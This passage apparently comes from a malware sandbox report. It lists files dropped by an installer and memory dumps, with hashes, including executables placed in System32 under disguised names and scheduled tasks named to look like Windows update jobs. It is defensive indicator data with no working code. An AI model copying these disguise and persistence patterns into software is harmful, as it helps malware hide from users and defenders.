                                                                                                                            d31fc3a6f4a3ce6c4afb82ff2342a1ed718809e5

                                                                                                                            SHA256

                                                                                                                            8014a7c919da249ba2f2196d9c9b62639d20851be426f3ffaef161cbe477c45f

                                                                                                                            SHA512

                                                                                                                            0f7321c2ae13145bb694368dae1b74e6fe20e6b09712da2178bc46e6aa65223ab84c38abbf0ed074c85b42dba1a238a5f3f8d1ae060a0af6df748c5befe11b61

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\windows\welcome\template.js

                                                                                                                            Filesize

                                                                                                                            1KB

                                                                                                                            MD5

                                                                                                                            17f54fca6723b983875d940d931e0afb

                                                                                                                            SHA1

                                                                                                                            01774cd5cea36bd74c80a708d6f77567e8091024

                                                                                                                            SHA256

                                                                                                                            42c546e9da748ef76fdab56b96fd511eb607617a9ba37b3dc420148b769d8acb

                                                                                                                            SHA512

                                                                                                                            401df9a54cd14c19227d91bd08b4775a7b437644b4ca0d1d636d3e07b04591f9c5516e80040ae6a79ba400457d15e3d80aa148a63de870a64664fc5a02f7a038

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\windows\welcome\welcome-controller.js

                                                                                                                            Filesize

                                                                                                                            2KB

                                                                                                                            MD5

                                                                                                                            50f676754862a2ab47a582dd4d79ecf3

                                                                                                                            SHA1

                                                                                                                            1cb2f4b11f9f8cfc8dc57ff29d0256dec4811158

                                                                                                                            SHA256

                                                                                                                            6155691dbdd66290109afb91617f9cf68af6bd912991d5d27b922f5faa7f530b

                                                                                                                            SHA512

                                                                                                                            ccfc89e08fd36f0a694fcda17efb84ca285b6c62afe2e3a794fdad19b6882a4b618645f4d9171673ba56fb4c55fce336d6b8d26dec3a5cc11293ae2b211f499f

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\manifest.json

                                                                                                                            Filesize

                                                                                                                            691B

                                                                                                                            MD5

                                                                                                                            b22a7aee785fd57c82dd5f7f76a0b300

                                                                                                                            SHA1

                                                                                                                            97528822fed8e42faa0de1f4d4c3de61cc6ce1e3

                                                                                                                            SHA256

                                                                                                                            53faf2f62e7aa22b60bc926803461213ce4230e114fce86acfe5cfd720f1dfb4

                                                                                                                            SHA512

                                                                                                                            4c66855ae30762b53f6f31bcfd3a24183614f8be716dc08180d5df2c71729ff0f1957ab04fc43b70e73c7e95511143e42dfde8150d2feb758804fecb12dd877d

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\log4net.dll

                                                                                                                            Filesize

                                                                                                                            270KB

                                                                                                                            MD5

                                                                                                                            f15c8a9e2876568b3910189b2d493706

                                                                                                                            SHA1

                                                                                                                            32634db97e7c1705286cb1ac5ce20bc4e0ec17af

                                                                                                                            SHA256

                                                                                                                            ae9c8073c3357c490f5d1c64101362918357c568f6b9380a60b09a4a4c1ff309

                                                                                                                            SHA512

                                                                                                                            805cd0a70aba2f1cf66e557d51ad30d42b32fbafcfbc6685ec204bc69847619479f653f4f33a4e466055707880d982eb1574ddab8edfa3c641e51cda950e2a0e

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\uac.dll

                                                                                                                            Filesize

                                                                                                                            24KB

                                                                                                                            MD5

                                                                                                                            861f7e800bb28f68927e65719869409c

                                                                                                                            SHA1

                                                                                                                            a12bfcd2b9950e758ead281a9afbf1895bf10539

                                                                                                                            SHA256

                                                                                                                            10a0e8cf46038ab3b2c3cf5dce407b9a043a631cbde9a5c8bcf0a54b2566c010

                                                                                                                            SHA512

                                                                                                                            f2bf24a0da69bbe4b4a0f0b1bfc5af175a66b8bcc4f5cc379ed0b89166fa9ffe1e16206b41fca7260ac7f8b86f8695b76f016bb371d7642aa71e61e29a3976eb

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\utils.dll

                                                                                                                            Filesize

                                                                                                                            58KB

                                                                                                                            MD5

                                                                                                                            c6b46a5fcdccbf3aeff930b1e5b383d4

                                                                                                                            SHA1

                                                                                                                            6d5a8e08de862b283610bad2f6ce44936f439821

                                                                                                                            SHA256

                                                                                                                            251ab3e2690562dcfcd510642607f206e6dcf626d06d94b74e1fa8297b1050a0

                                                                                                                            SHA512

                                                                                                                            97616475ef425421959489b650810b185488fcb02a1e90406b3014e948e66e5101df583815fd2be26d9c4d293a46b02ba4025426f743e682ed15d228f027f55c

                                                                                                                          • C:\Windows\System32\$Node2Json.exe

                                                                                                                            Filesize

                                                                                                                            116KB

                                                                                                                            MD5

                                                                                                                            41814c2aa6f0aaffaaaa26ffd07b3550

                                                                                                                            SHA1

                                                                                                                            ea9731c42a382ed003b5b4bfd28c3ba437c8d14a

                                                                                                                            SHA256

                                                                                                                            da2926ac30bda874255c093b58a8a4efa4b8e7872393ea4a242f17a4e3ab014e

                                                                                                                            SHA512

                                                                                                                            f2513d8e10536bd747dd1ec4a6aa9ec0007ea9a4484c364b2cf9d5ffd42cf3bcd0e346040d4c34c3dba28a208752b82c41bdae2a9dd88ebc1ba869cd1907877d

                                                                                                                          • C:\Windows\System32\$Node32.exe

                                                                                                                            Filesize

                                                                                                                            163KB

                                                                                                                            MD5

                                                                                                                            b850f016450d68da0ae4bb945355f70c

                                                                                                                            SHA1

                                                                                                                            521726c38af715e6ee1c76315151f0ed9518c6f4

                                                                                                                            SHA256

                                                                                                                            8a649909d1defa1b8966cde6ad854f3cbf7662a732cf1a16b853c793cf240d24

                                                                                                                            SHA512

                                                                                                                            30f152e08ba44308da9b9c42951e45a9b6c2ad808c3a426da4af0384939816e04f1faf38de1d3c404e515d90b2e2eaeabe152b0151fb3f21c6a00bd2fdac3b6c

                                                                                                                          • C:\Windows\System32\$Node3Json.exe

                                                                                                                            Filesize

                                                                                                                            117KB

                                                                                                                            MD5

                                                                                                                            391d4f99d0076ce566b370f1572ef670

                                                                                                                            SHA1

                                                                                                                            0bf04beb77440315098bacf30563a6542e254a45

                                                                                                                            SHA256

                                                                                                                            b55dbc5b3437654eca9fd1ea4826f81bde74af9e0c69109c25188461eb6a3605

                                                                                                                            SHA512

                                                                                                                            1952fa90fc139863381c15f424a8146335cbbc6f443efcdffc502f1064889a244fa7da1b30ebd4c9b2bec15fd55d367a2aa80afd576b1e2c4baed40ffec76497

                                                                                                                          • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                            Filesize

                                                                                                                            2KB

                                                                                                                            MD5

                                                                                                                            4ac1741ceb19f5a983079b2c5f344f5d

                                                                                                                            SHA1

                                                                                                                            f1ebd93fbade2e035cd59e970787b8042cdd0f3b

                                                                                                                            SHA256

                                                                                                                            7df73f71214cdd2f2d477d6c2c65f6e4c2f5955fc669cde9c583b0ff9553ecdc

                                                                                                                            SHA512

                                                                                                                            583706069a7c0b22926fa22fc7bedcca9d6750d1542a1125b688fbb0595baf6cefc76e7b6e49c1415c782a21d0dd504c78fa36efad5f29f2fd5d69cc45ad8dcd

                                                                                                                          • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                            Filesize

                                                                                                                            2KB

                                                                                                                            MD5

                                                                                                                            a9124c4c97cba8a07a8204fac1696c8e

                                                                                                                            SHA1

                                                                                                                            1f27d80280e03762c7b16781608786f5a98ff434

                                                                                                                            SHA256

                                                                                                                            8ad3d28aeff847bc5fb8035cbc7c71e88a4ee547821a8e1a3ea6661ee6014b21

                                                                                                                            SHA512

                                                                                                                            537caaa75ac1e257c6b247f9680c3b9e79156ea1bcb3f1326e969a774db33b3c906800813ca6f79369c799a62f4260c91c6dd9a6cace3af25b7dbea5a73e0392

                                                                                                                          • memory/620-498-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            32KB

                                                                                                                          • memory/620-503-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            32KB

                                                                                                                          • memory/620-504-0x00007FF9F47B0000-0x00007FF9F49A8000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            2.0MB

                                                                                                                          • memory/620-496-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            32KB

                                                                                                                          • memory/620-505-0x00007FF9F2BA0000-0x00007FF9F2C5D000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            756KB

                                                                                                                          • memory/620-497-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            32KB

                                                                                                                          • memory/620-499-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            32KB

                                                                                                                          • memory/620-506-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            32KB

                                                                                                                          • memory/624-511-0x00000251F5C30000-0x00000251F5C5A000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/624-509-0x00000251F5BA0000-0x00000251F5BC5000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            148KB

                                                                                                                          • memory/624-516-0x00000251F5C30000-0x00000251F5C5A000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/624-517-0x00007FF9B4830000-0x00007FF9B4840000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            64KB

                                                                                                                          • memory/624-510-0x00000251F5C30000-0x00000251F5C5A000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/676-526-0x000001D51FE00000-0x000001D51FE2A000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/676-521-0x000001D51FE00000-0x000001D51FE2A000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/676-527-0x00007FF9B4830000-0x00007FF9B4840000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            64KB

                                                                                                                          • memory/908-493-0x000001F527610000-0x000001F52763A000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/908-494-0x00007FF9F47B0000-0x00007FF9F49A8000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            2.0MB

                                                                                                                          • memory/908-495-0x00007FF9F2BA0000-0x00007FF9F2C5D000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            756KB

                                                                                                                          • memory/956-531-0x0000028338BD0000-0x0000028338BFA000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/956-536-0x0000028338BD0000-0x0000028338BFA000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/956-537-0x00007FF9B4830000-0x00007FF9B4840000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            64KB

                                                                                                                          • memory/1240-23-0x000001E2FF720000-0x000001E2FF742000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            136KB

                                                                                                                          • memory/1240-27-0x00007FF9D6320000-0x00007FF9D6DE2000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            10.8MB

                                                                                                                          • memory/1240-176-0x00007FF9D6320000-0x00007FF9D6DE2000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            10.8MB

                                                                                                                          • memory/1240-44-0x00007FF9D6320000-0x00007FF9D6DE2000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            10.8MB

                                                                                                                          • memory/1240-16-0x00007FF9D6320000-0x00007FF9D6DE2000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            10.8MB

                                                                                                                          • memory/1300-408-0x000002A4E1260000-0x000002A4E1261000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            4KB

                                                                                                                          • memory/1300-399-0x000002A4E1260000-0x000002A4E1261000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            4KB

                                                                                                                          • memory/1300-398-0x000002A4E1260000-0x000002A4E1261000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            4KB

                                                                                                                          • memory/1300-397-0x000002A4E1260000-0x000002A4E1261000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            4KB

                                                                                                                          • memory/1300-406-0x000002A4E1260000-0x000002A4E1261000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            4KB

                                                                                                                          • memory/1300-405-0x000002A4E1260000-0x000002A4E1261000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            4KB

                                                                                                                          • memory/1300-407-0x000002A4E1260000-0x000002A4E1261000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            4KB

                                                                                                                          • memory/1300-409-0x000002A4E1260000-0x000002A4E1261000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            4KB

                                                                                                                          • memory/1300-410-0x000002A4E1260000-0x000002A4E1261000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            4KB

                                                                                                                          • memory/1300-404-0x000002A4E1260000-0x000002A4E1261000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            4KB

                                                                                                                          • memory/2004-461-0x0000000000830000-0x0000000000852000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            136KB

                                                                                                                          • memory/2164-209-0x0000000000BF0000-0x0000000000C52000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            392KB

                                                                                                                          • memory/3140-491-0x0000000000AD0000-0x0000000000AF2000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            136KB

                                                                                                                          • memory/3564-13-0x00007FF9D6320000-0x00007FF9D6DE2000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            10.8MB

                                                                                                                          • memory/3564-1-0x00000000008D0000-0x0000000000B52000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            2.5MB

                                                                                                                          • memory/3564-205-0x00007FF9D6320000-0x00007FF9D6DE2000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            10.8MB

                                                                                                                          • memory/3564-0-0x00007FF9D6323000-0x00007FF9D6325000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            8KB

                                                                                                                          • memory/3720-170-0x0000020265690000-0x00000202656A4000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            80KB

                                                                                                                          • memory/3720-168-0x000002027F7C0000-0x000002027F866000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            664KB

                                                                                                                          • memory/3720-171-0x0000020200000000-0x0000020200528000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            5.2MB

                                                                                                                          • memory/3720-164-0x0000020265290000-0x00000202652DE000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            312KB

                                                                                                                          • memory/3720-175-0x000002027F710000-0x000002027F756000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            280KB

                                                                                                                          • memory/3720-180-0x0000020267000000-0x0000020267018000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            96KB

                                                                                                                          • memory/3720-265-0x0000020A80710000-0x0000020A80EB6000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            7.6MB

                                                                                                                          • memory/3720-210-0x000002027FE80000-0x000002027FF30000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            704KB

                                                                                                                          • memory/3720-279-0x00000202012B0000-0x0000020201A1B000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            7.4MB